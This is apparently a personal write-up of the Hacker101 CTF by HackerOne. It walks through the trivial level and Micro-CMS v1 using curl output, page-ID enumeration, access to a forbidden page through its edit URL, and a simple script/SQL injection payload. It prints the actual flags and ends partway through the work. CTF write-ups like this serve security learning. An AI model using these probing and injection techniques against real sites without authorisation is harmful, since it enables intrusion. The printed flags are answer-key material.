Introduction
Hacker101 CTF seems to be a new CTF setup by HackerOne, the bug bountry program. Flag formats are meant to be similar to ^FLAG^37ae568362f974017fa575f08cd215044cd6bb395c3f5e5e293ee5324ba6769c$FLAG$
. Requires a HackerOne account to login. Additional instruction can be found at https://docs.hackerone.com/hackers/hacker101.html
.
The challenge difficulty ranking is done using trivial, easy, moderate, hard, and expert. Points are allocated according to difficulty and range from 1 point for trivial to 9 points for expert. Each challeneg may have multiple flag indicated by the completion. The minimum number of flags per challenge was 1, with a maximum of 7 for the Postbook challenge.
WARNING: This post containd actual flags
Trivial (1 / flag) A little something to get you started Web
- Naviagtes to
http://35.227.24.107/a5fa082820/
curl -v http://35.227.24.107/a5fa082820/
* Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:11:47 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 194
< Connection: keep-alive
<
<!doctype html>
<html>
<head>
<style>
body {
background-image: url("background.png");
}
</style>
</head>
<body>
<p>Welcome to level 0. Enjoy your stay.</p>
</body>
</html>
* Connection #0 to host 35.227.24.107 left intact
- Hint: Take a look at the source for the page
- Attempted
http://35.227.24.107/a5fa082820/background.png
curl -v http://35.227.24.107/a5fa082820/background.png
* Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/background.png HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:16:02 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 76
< Connection: keep-alive
<
^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$* Connection #0 to host 35.227.24.107 left intact
- Submitted:
^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$
Easy (2 / flag) Micro-CMS v1 Web
- Navigated to
http://35.227.24.107/06e5e5463a/
curl -v http://35.227.24.107/06e5e5463a/
* Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /06e5e5463a/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:18:32 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 236
< Connection: keep-alive
<
<!doctype html>
<html>
<head>
<title>Micro-CMS</title>
</head>
<body>
<ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
</ul>
<a href="page/create">Create a new page</a>
</body>
</html>
* Connection #0 to host 35.227.24.107 left intact
- Manually navigated the site and explored the page preview and edit function, also created a page, and noticed that the page number was page 13
- Iterated through all pages from 1 - 13 to a file for manual review using
for /l %i in (1,1,13) do ( curl -v http://35.227.24.107/06e5e5463a/page/%i ) >> Micro-CMS_v1.txt
- Majority of pages returned error messages indicating that the page was not found
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
- However, one page returned a different message indicating that the page may be protected, i.e. page 6
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>
- Attemped to edit the page by editing the test page I had created and then changing the query string to page siz, i.e.
http://35.227.24.107/06e5e5463a/page/edit/6
- Found a flag
My secret is ^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
- Submitted:
^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
- Realised that this challenge had multiple flags, could not find anything else, so went to hints for the challenge and got
Hints for "Micro-CMS v1"
Flag0 -- Found
Try creating a new page
How are pages indexed?
Look at the sequence of IDs
If the front door doesn't open, try the window
In what ways can you retrieve page contents?
Flag1 -- Not Found
You don't have any hints for this flag yet.
Flag2 -- Not Found
You don't have any hints for this flag yet.
Flag3 -- Not Found
You don't have any hints for this flag yet.
- Clicked on Get a hint button and got
Make sure you tamper with every input
- Attempted basic SQL injection - no result
- Attempted Javascript injection -
<script>
tags replaced with<scrubbed>
in the CMS page, and<
and>
replaced by<
and>
, so some input sanitisation is occuring ' OR 1=1; --x <Script>alert("hello world");
- It wasn’t unit the
<-- Go Home
link is clicked that the Javascript inject actually triggers - We get a Javascript pop-up with the flag
- Submitted:
^FLAG^468c7fb39ff2b5b8d10eff89231d39521e430bef688904069211feedb5215d11$FLAG$
- Since the Javascript triggered on the home page, manually navigated to all other pages and edit pages to see if another script triggered.
- Discovered: that on the Markdown Test page, cannot save the page because the URL to the adorable kitten is broken.
- Tried injecting in the CMS page content and manually navigated to other pages